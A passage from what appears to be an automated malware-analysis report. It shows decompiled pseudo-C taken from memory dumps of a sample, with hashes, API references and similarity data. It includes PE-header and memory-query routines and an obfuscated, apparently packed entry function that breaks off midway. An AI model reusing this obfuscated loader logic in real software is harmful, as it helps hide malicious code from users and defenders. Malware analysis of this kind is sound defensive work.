								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xf9a330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xf9a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xf9a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00f981d7
0x00f981da
0x00f981e0
0x00f981fe
0x00000000
0x00f981fe
0x00f981e8
0x00f981f1
0x00f981f7
0x00f98206
0x00f98209
0x00f9820c
0x00f98216
0x00f98216
0x00f98218
0x00f9821b
0x00f9821d
0x00f9821d
0x00f9821f
0x00f98222
0x00000000
0x00000000
0x00f98224
0x00f98226
0x00f9828c
0x00f9828c
0x00f983ea
0x00000000
0x00f983ea
0x00f98228
0x00f98228
0x00f9822c
0x00f9822e
0x00f9822e
0x00f9822e
0x00f9822e
0x00f98231
0x00f98232
0x00f98235
0x00f98235
0x00f98239
0x00f9823d
0x00f9824b
0x00f9824b
0x00f98253
0x00f98259
0x00f9825b
0x00f9825d
0x00f9826d
0x00f9827a
0x00f9827e
0x00f98283
0x00f98285
0x00f98303
0x00f98303
0x00f98287
0x00f98287
0x00f98287
0x00f98305
0x00f98307
0x00f983e8
0x00f983e8
0x00000000
0x00f9830d
0x00f9830d
0x00f98314
0x00000000
0x00000000
0x00f9831a
0x00f9831e
0x00f9837a
0x00f9837c
0x00f98384
0x00f98386
0x00f98388
0x00000000
0x00000000
0x00f9838a
0x00f98390
0x00f98392
0x00f98394
0x00f983a9
0x00f983a9
0x00f983ab
0x00f983da
0x00f983e1
0x00000000
0x00f983e1
0x00f983af
0x00f983b0
0x00f983b2
0x00f983b4
0x00f983b4
0x00f983b6
0x00f983b8
0x00f983ba
0x00f983ce
0x00f983ce
0x00f983d1
0x00f983d3
0x00f983d3
0x00f983d4
0x00f983d4
0x00000000
0x00f983bc
0x00f983bc
0x00f983bc
0x00f983c5
0x00f983c6
0x00f983c8
0x00f983ca
0x00f983ca
0x00000000
0x00f983bc
0x00f983ba
0x00f98396
0x00f9839d
0x00f9839d
0x00f9839f
0x00000000
0x00000000
0x00f983a1
0x00f983a2
0x00f983a5
0x00f983a7
0x00000000
0x00000000
0x00000000
0x00f983a7
0x00000000
0x00f9839d
0x00f98320
0x00f98323
0x00f98328
0x00000000
0x00000000
0x00f98331
0x00f98333
0x00f98339
0x00000000
0x00000000
0x00f9833f
0x00f98345
0x00000000
0x00000000
0x00f9834b
0x00f9834d
0x00f98356
0x00f9835a
0x00000000
0x00000000
0x00f98360
0x00f98363
0x00f98365
0x00000000
0x00000000
0x00f9836c
0x00f9836e
0x00000000
0x00000000
0x00f98370
0x00f98374
0x00000000
0x00000000
0x00000000
0x00f98374
0x00000000
0x00000000
0x00000000
0x00f9825f
0x00f9825f
0x00f9825f
0x00f98266
0x00000000
0x00000000
0x00f98268
0x00f98269
0x00f9826b
0x00000000
0x00000000
0x00000000
0x00f9826b
0x00f98293
0x00f98295
0x00000000
0x00000000
0x00f982a5
0x00f982a7
0x00f982a9
0x00000000
0x00000000
0x00f982af
0x00f982b6
0x00f982e2
0x00f982e2
0x00f982e4
0x00f982e6
0x00f982fa
0x00f982fc
0x00000000
0x00000000
0x00000000
0x00000000
0x00f982e8
0x00f982e8
0x00f982e8
0x00f982f1
0x00f982f2
0x00f982f4
0x00f982f6
0x00f982f6
0x00000000
0x00f982e8
0x00f982b8
0x00f982b8
0x00f982bb
0x00f982bd
0x00f982cf
0x00f982cf
0x00f982d2
0x00f982d4
0x00f982d4
0x00f982d5
0x00f982d5
0x00f982db
0x00f982db
0x00000000
0x00000000
0x00000000
0x00000000
0x00f982bf
0x00f982bf
0x00f982bf
0x00f982c6
0x00000000
0x00000000
0x00f982c8
0x00f982c8
0x00f982c9
0x00000000
0x00000000
0x00000000
0x00f982c9
0x00f982cb
0x00f982cd
0x00f982e0
0x00000000
0x00000000
0x00000000
0x00f982e0
0x00000000
0x00f982cd
0x00f9823f
0x00f98242
0x00f98245
0x00000000
0x00000000
0x00f98247
0x00f98249
0x00000000
0x00000000
0x00000000
0x00f98249
0x00f9820e
0x00f98210
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00F9827E

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: c2c21855229c755793727cf0de268be07e147134820fd18a0211c8ffe4ae6009
Instruction ID: f78f7eafe397f8c7c16e0deb355b8e59bbc222eb7e43e15450c28f3dce755993
Opcode Fuzzy Hash: c2c21855229c755793727cf0de268be07e147134820fd18a0211c8ffe4ae6009
Instruction Fuzzy Hash: 7A61B331A04A05DFFF2ACF28D890E2933A5EB977A4B248169D816C7191EF31DC43A685

Uniqueness

Uniqueness Score: -1.00%

Function 10002485, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x100041f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x10004240 = 1;
										__eflags =  *0x10004240;
										if( *0x10004240 != 0) {
											goto L60;
										}
										_t84 =  *0x100041f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x10004240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x100041f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10004200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x100041fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10004200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x10004240 = 1;
							__eflags =  *0x10004240;
							if( *0x10004240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10004200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10004200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x10004240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10004200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x100041f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10004200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x1000248f
0x10002492
0x10002498
0x100024b6
0x00000000
0x100024b6
0x100024a0
0x100024a9
0x100024af
0x100024be
0x100024c1
0x100024c4
0x100024ce
0x100024ce
0x100024d0
0x100024d3
0x100024d5
0x100024d5
0x100024d7
0x100024da
0x00000000
0x00000000
0x100024dc
0x100024de
0x10002544
0x10002544
0x100026a2
0x00000000
0x100026a2
0x100024e0
0x100024e0
0x100024e4
0x100024e6
0x100024e6
0x100024e6
0x100024e6
0x100024e9
0x100024ea
0x100024ed
0x100024ed
0x100024f1
0x100024f5
0x10002503
0x10002503
0x1000250b
0x10002511
0x10002513
0x10002515
0x10002525
0x10002532
0x10002536
0x1000253b
0x1000253d
0x100025bb
0x100025bb
0x1000253f
0x1000253f
0x1000253f
0x100025bd
0x100025bf
0x100026a0
0x100026a0
0x00000000
0x100025c5
0x100025c5
0x100025cc
0x00000000
0x00000000
0x100025d2
0x100025d6
0x10002632
0x10002634
0x1000263c
0x1000263e
0x10002640
0x00000000
0x00000000
0x10002642
0x10002648
0x1000264a
0x1000264c
0x10002661
0x10002661
0x10002663
0x10002692
0x10002699
0x00000000
0x10002699
0x10002667
0x10002668
0x1000266a
0x1000266c
0x1000266c
0x1000266e
0x10002670
0x10002672
0x10002686
0x10002686
0x10002689
0x1000268b
0x1000268b
0x1000268c
0x1000268c
0x00000000
0x10002674
0x10002674
0x10002674
0x1000267d
0x1000267e
0x10002680
0x10002682
0x10002682
0x00000000
0x10002674
0x10002672
0x1000264e
0x10002655
0x10002655
0x10002657
0x00000000
0x00000000
0x10002659
0x1000265a
0x1000265d
0x1000265f
0x00000000
0x00000000
0x00000000
0x1000265f
0x00000000
0x10002655
0x100025d8
0x100025db
0x100025e0
0x00000000
0x00000000
0x100025e9
0x100025eb
0x100025f1
0x00000000
0x00000000
0x100025f7
0x100025fd
0x00000000
0x00000000
0x10002603
0x10002605
0x1000260e
0x10002612
0x00000000
0x00000000
0x10002618
0x1000261b
0x1000261d
0x00000000
0x00000000
0x10002624
0x10002626
0x00000000
0x00000000
0x10002628
0x1000262c
0x00000000
0x00000000
0x00000000
0x1000262c
0x00000000
0x00000000
0x00000000
0x10002517
0x10002517
0x10002517
0x1000251e
0x00000000
0x00000000
0x10002520
0x10002521
0x10002523
0x00000000
0x00000000
0x00000000
0x10002523
0x1000254b
0x1000254d
0x00000000
0x00000000
0x1000255d
0x1000255f
0x10002561
0x00000000
0x00000000
0x10002567
0x1000256e
0x1000259a
0x1000259a
0x1000259c
0x1000259e
0x100025b2
0x100025b4
0x00000000
0x00000000
0x00000000
0x00000000
0x100025a0
0x100025a0
0x100025a0
0x100025a9
0x100025aa
0x100025ac
0x100025ae
0x100025ae
0x00000000
0x100025a0
0x10002570
0x10002573
0x10002575
0x10002587
0x10002587
0x1000258a
0x1000258c
0x1000258c
0x1000258d
0x1000258d
0x10002593
0x00000000
0x00000000
0x00000000
0x00000000
0x10002577
0x10002577
0x10002577
0x1000257e
0x00000000
0x00000000
0x10002580
0x10002580
0x10002581
0x00000000
0x00000000
0x00000000
0x10002581
0x10002583
0x10002585
0x10002598
0x00000000
0x00000000
0x00000000
0x10002598
0x00000000
0x10002585
0x100024f7
0x100024fa
0x100024fd
0x00000000
0x00000000
0x100024ff
0x10002501
0x00000000
0x00000000
0x00000000
0x10002501
0x100024c6
0x100024c8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002536

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: ba2ec8e7252ae26f1f270b24edf6a73b8c1a6cacbae479f3599f6f6d57331f40
Instruction ID: a7a85f5cdac94ca20881f59076e2ff92bc399d555ceef88d87b86196ef6f6d24
Opcode Fuzzy Hash: ba2ec8e7252ae26f1f270b24edf6a73b8c1a6cacbae479f3599f6f6d57331f40
Instruction Fuzzy Hash: B461EF70B00A528FFB19CF28CCE075973E5EB853D5F628069D816C729DEB32DC828A54

Uniqueness

Uniqueness Score: -1.00%

Function 02E9810A, Relevance: .2, Instructions: 227
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			_entry_() {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v56;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				char _v80;
				signed int _v84;
				intOrPtr _v92;
				void* _t702;
				signed int _t704;
				signed int _t705;
				signed int _t707;
				signed int _t708;
				intOrPtr _t709;
				intOrPtr _t710;
				signed int _t711;
				signed int _t712;
				signed int _t715;
				signed int _t719;
				signed int _t720;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				void* _t728;
				signed int _t729;
				signed int _t733;
				intOrPtr _t736;
				signed int _t737;
				signed int _t738;
				intOrPtr _t739;
				signed int _t742;
				signed int _t743;
				signed int _t746;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				signed int _t753;
				void* _t754;
				signed int _t755;
				signed int _t758;
				signed int _t759;
				char _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t767;
				intOrPtr* _t768;
				intOrPtr _t769;
				signed int _t770;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				intOrPtr _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t797;
				signed int _t798;
				signed int _t799;
				signed int _t800;
				intOrPtr _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				intOrPtr _t806;
				signed int _t807;
				intOrPtr _t808;
				signed int _t809;
				signed int _t811;
				void* _t813;
				void* _t815;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t828;
				signed int _t829;
				intOrPtr _t831;
				signed int _t832;
				intOrPtr _t833;
				signed int _t836;
				signed int _t837;
				int _t839;
				signed int _t841;
				signed int _t847;
				signed int _t848;
				signed int _t852;
				void* _t853;
				signed int _t854;
				signed int _t855;
				signed int _t858;
				signed int _t861;
				signed int _t881;
				signed int _t883;
				signed int _t890;
				signed int _t896;
				signed int _t899;
				signed int _t902;
				void* _t909;
				void* _t911;
				signed int _t913;
				signed int _t922;
				signed int _t923;
				signed int _t939;
				signed int _t945;
				signed int _t952;
				signed int _t954;
				void* _t957;
				signed int _t959;
				signed int _t962;
				signed int _t975;
				signed int _t1011;
				void* _t1013;
				void* _t1019;
				signed int _t1025;
				void* _t1038;
				signed int _t1042;
				void* _t1057;
				signed int _t1058;
				void* _t1061;
				signed int _t1063;
				signed int _t1066;
				signed int _t1080;
				signed int _t1087;
				signed int* _t1088;
				void** _t1089;

				_t1058 = _t1087;
				_t1088 = _t1087 + 0xfffffff4;
				_v24 = 0xffff0000;
				E02E95B06(_t702, _t837, _t896, _t952, _t1058);
				_t704 =  *((intOrPtr*)(_t836 + 0xa901b4))(_t1057, 0xffffffff);
				if(_t836 > 0) {
					_v24 = _v24 + 0x247;
					_v24 = _v24 - _t704;
					_v28 = _v28 + 0x567;
					_v28 = _v28 - _t1011;
					_t720 = L02E921AB(_t704, _t836, _t837, _t896, _t1011, _t704);
					_t1066 = _t720 | _t720;
					_t704 = _t1066;
					_t1058 = _t1058;
					if(_t1066 == 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = _v24 + _t704;
						_v28 = _v28 - _t1011;
						_v28 = _v28 | _t837;
						_v32 = _v32 - _t1058;
						_v32 = _v32 | _t896;
						_v12 = _v12 & 0x00000000;
						 *_t1088 =  *_t1088 | _t836 + 0x0041c7ec;
						_t722 =  *((intOrPtr*)(_t836 + 0xa90128))(_v12, _v20);
						_v12 = _t1011;
						 *(_t836 + 0x41d5a2) =  *(_t836 + 0x41d5a2) & 0x00000000;
						 *(_t836 + 0x41d5a2) =  *(_t836 + 0x41d5a2) ^ (_t1011 - _v12 | _t722);
						_t1011 = _v12;
						_pop(_t913);
						_t847 = _t1058;
						_t723 = _t1011;
						if( *(_t836 + 0x41d8d3) == 0) {
							_push(_t1058);
							 *_t1088 =  *_t1088 ^ _t1058;
							 *_t1088 = _t913;
							if( *((intOrPtr*)(_t836 + 0x41d1d3)) == 0) {
								_t833 =  *((intOrPtr*)(_t836 + 0xa90140))();
								_v16 = _t952;
								 *((intOrPtr*)(_t836 + 0x41d1d3)) = _t833;
								_t952 = _v16;
							}
							_v40 =  *((intOrPtr*)(_t836 + 0x41cef7));
							_t824 =  *((intOrPtr*)(_t836 + 0xa90138))(_t913, _t952);
							if( *(_t836 + 0x41c19e) == 0) {
								_v44 = _t824;
								_t832 =  *((intOrPtr*)(_t836 + 0xa901d0))(_v20);
								_v48 = _t1011;
								 *(_t836 + 0x41c19e) = 0 ^ _t832;
								_t1011 = 0;
								_pop(_t824);
							}
							_v16 = _t952;
							 *(_t836 + 0x41d8d3) =  *(_t836 + 0x41d8d3) & 0x00000000;
							 *(_t836 + 0x41d8d3) =  *(_t836 + 0x41d8d3) ^ _t952 & 0x00000000 ^ _t824;
							_t952 = _v16;
							if( *((intOrPtr*)(_t836 + 0x41d361)) == 0) {
								_v44 =  *((intOrPtr*)(_t836 + 0x41cc2f));
								_t952 = _t952;
								_t831 =  *((intOrPtr*)(_t836 + 0xa901cc))(_t952);
								_v48 = _t1011;
								 *((intOrPtr*)(_t836 + 0x41d361)) = _t831;
								_t1011 = 0;
							}
							_pop(_t945);
							if( *((intOrPtr*)(_t836 + 0x41c0a4)) == 0) {
								_v20 = _v20 & 0x00000000;
								_v40 = _v40 + _t945;
								_v44 = _t952;
								_push( *((intOrPtr*)(_t836 + 0xa90134))(_v20, _v20));
								_pop( *_t69);
								_push(_v16);
								_pop( *_t71);
								_pop(_t945);
							}
							_pop(_t890);
							if( *(_t836 + 0x41c545) == 0) {
								 *_t1088 = _t890;
								_v16 = 0;
								_v40 = _v40 | _t945;
								_t829 =  *((intOrPtr*)(_t836 + 0xa901d0))(_v16, _v16);
								_v16 = _t890;
								 *(_t836 + 0x41c545) = 0 ^ _t829;
								_pop(_t945);
								_pop(_t890);
							}
							_pop(_t825);
							_v32 = _t825;
							_v16 = _v16 & 0x00000000;
							 *_t1088 =  *_t1088 | _t890;
							_v40 = _v40 ^ _t836;
							_v40 = _v40 | _t945;
							_v44 = _v44 & 0x00000000;
							_v44 = _v44 | _t836 + 0x0041ce98;
							_v20 = _v20 & 0x00000000;
							_v48 = _v48 | _t836 + 0x0041c5be;
							_t828 =  *((intOrPtr*)(_t836 + 0xa90130))(_v20, _t836, _v16, _v20);
							 *(_t836 + 0x41c3f1) =  *(_t836 + 0x41c3f1) & 0x00000000;
							 *(_t836 + 0x41c3f1) =  *(_t836 + 0x41c3f1) ^ _t945 & 0x00000000 ^ _t828;
							_t913 = _t945;
							_pop(_t847);
							_t723 = _t1058;
						}
						if( *(_t836 + 0x41d7d5) == 0) {
							_v28 = _t723;
							_v16 = 0;
							_v32 = _v32 + _t847;
							_v16 = 0;
							 *_t1088 =  *_t1088 ^ _t913;
							_v40 = _t836 + 0x41ccd5;
							_v20 = 0;
							_v44 = _v44 ^ _t836 + 0x0041cb78;
							_t749 =  *((intOrPtr*)(_t836 + 0xa90130))(_v20, _v12, _v16, _v16, _v16);
							_v48 = _t1011;
							 *(_t836 + 0x41d290) = 0 ^ _t749;
							_t1025 = 0;
							_pop(_t922);
							_pop(_t852);
							_pop(_t750);
							if( *((intOrPtr*)(_t836 + 0x41c627)) == 0) {
								if( *(_t836 + 0x41cf6f) == 0) {
									 *_t1088 =  *_t1088 & 0x00000000;
									 *_t1088 =  *_t1088 + _t750;
									_v16 = 0;
									_v40 = _v40 ^ _t852;
									_v44 = _v44 & 0x00000000;
									_v44 = _v44 | _t922;
									_v48 =  *((intOrPtr*)(_t836 + 0x41c706));
									_t1058 = _t1058;
									_t823 =  *((intOrPtr*)(_t836 + 0xa901c8))(_v16, _t852);
									_v20 = _t852;
									 *(_t836 + 0x41cf6f) = 0 ^ _t823;
									_t922 = _t852;
									_t852 = _t952;
									_pop(_t750);
								}
								_push(_t836);
								 *_t1088 =  *_t1088 & 0x00000000;
								 *_t1088 =  *_t1088 | _t750;
								_push(_t750);
								_v40 = _v40 ^ _t750;
								_v40 = _v40 ^ _t852;
								if( *(_t836 + 0x41c5db) == 0) {
									_v44 = _v44 & 0x00000000;
									_v44 = _v44 + _t922;
									_t822 =  *((intOrPtr*)(_t836 + 0xa9013c))();
									 *(_t836 + 0x41c5db) =  *(_t836 + 0x41c5db) & 0x00000000;
									 *(_t836 + 0x41c5db) =  *(_t836 + 0x41c5db) | _t1025 & 0x00000000 | _t822;
									_t1025 = _t1025;
									_t922 = _t1058;
								}
								_v16 = _v16 & 0x00000000;
								_v44 = _v44 | _t922;
								_t809 =  *((intOrPtr*)(_t836 + 0xa90110))(_v16);
								_v12 = 0;
								_v48 = _v48 | _t809;
								_v12 = _v12 & 0x00000000;
								 *_t1088 =  *_t1088 | _t836 + 0x0041d9ee;
								_t811 =  *((intOrPtr*)(_t836 + 0xa90128))(_v12, _v12);
								_v56 = _v56 & 0x00000000;
								_v56 = _v56 | _t811;
								 *_t1088 = _t836 + 0x41d0a0;
								_t813 =  *((intOrPtr*)(_t836 + 0xa90128))(_v20, _t1025);
								_pop(_t881);
								_t883 = _t881 & 0x00000000 ^ (_t1025 & 0x00000000 |  *(_t836 + 0x41c51f));
								_t1025 = _t1025;
								if(_t883 > _t813 + _t881) {
									 *_t1088 = _t836 + 0x41d9ee;
									_v12 = 0;
									_v64 = _v64 ^ _t836 + 0x0041d0a0;
									_t821 =  *((intOrPtr*)(_t836 + 0xa9012c))(_v12, _v20);
									 *(_t836 + 0x41c94a) =  *(_t836 + 0x41c94a) & 0x00000000;
									 *(_t836 + 0x41c94a) =  *(_t836 + 0x41c94a) ^ (_t952 ^ _v68 | _t821);
									_t952 = _t952;
								}
								_pop(_t815);
								 *_t148 = _t815;
								_push(_v20);
								_pop( *_t150);
								_pop(_t922);
								if( *(_t836 + 0x41d0d5) == 0) {
									 *_t1088 =  *_t1088 ^ _t1058;
									 *_t1088 = _t922;
									_t817 = _t836 + 0x41d4cd;
									_v12 = 0;
									_v56 = _v56 ^ _t817;
									 *_t817 = 0x14;
									_t818 =  *((intOrPtr*)(_t836 + 0xa901c4))(_v12, _t1058);
									 *(_t836 + 0x41d0d5) =  *(_t836 + 0x41d0d5) & 0x00000000;
									 *(_t836 + 0x41d0d5) =  *(_t836 + 0x41d0d5) | _t883 & 0x00000000 | _t818;
									_t922 = _t883;
								}
								_pop(_t852);
								_pop(_t750);
								if( *(_t836 + 0x41c19a) == 0) {
									_v44 = _v44 ^ _t922;
									_v44 = _v44 + _t750;
									_v48 = _t852;
									_v12 = _v12 & 0x00000000;
									 *_t1088 =  *_t1088 + _t922;
									_v56 =  *((intOrPtr*)(_t836 + 0x41cb28));
									_t939 = _t922;
									_t816 =  *((intOrPtr*)(_t836 + 0xa901c8))(_v12, _v20, _t922);
									_v12 = _t939;
									 *(_t836 + 0x41c19a) =  *(_t836 + 0x41c19a) & 0x00000000;
									 *(_t836 + 0x41c19a) =  *(_t836 + 0x41c19a) | _t939 & 0x00000000 ^ _t816;
									_t922 = _t1058;
									_pop(_t852);
									_pop(_t750);
								}
							}
							_push(_t952);
							 *_t1088 =  *_t1088 & 0x00000000;
							 *_t1088 =  *_t1088 ^ _t750;
							_v12 = _v12 & 0x00000000;
							_push(_v12);
							_v40 = _v40 | _t852;
							if( *((intOrPtr*)(_t836 + 0x41cbca)) == 0) {
								_v44 = _t922;
								_v48 =  *((intOrPtr*)(_t836 + 0x41d71d));
								_t808 =  *((intOrPtr*)(_t836 + 0xa901cc))(_t852, _v20);
								 *_t1088 = _v48;
								 *((intOrPtr*)(_t836 + 0x41cbca)) = _t808;
								_t922 = 0;
							}
							_push(_v16);
							_v44 = _t922;
							_t751 = _t836 + 0x41c8c6;
							if( *(_t836 + 0x41c54d) == 0) {
								_v48 = _v48 & 0x00000000;
								_v48 = _v48 | _t751;
								_t807 =  *((intOrPtr*)(_t836 + 0xa90110))();
								 *(_t836 + 0x41c54d) =  *(_t836 + 0x41c54d) & 0x00000000;
								 *(_t836 + 0x41c54d) =  *(_t836 + 0x41c54d) ^ (_t922 ^  *_t1088 | _t807);
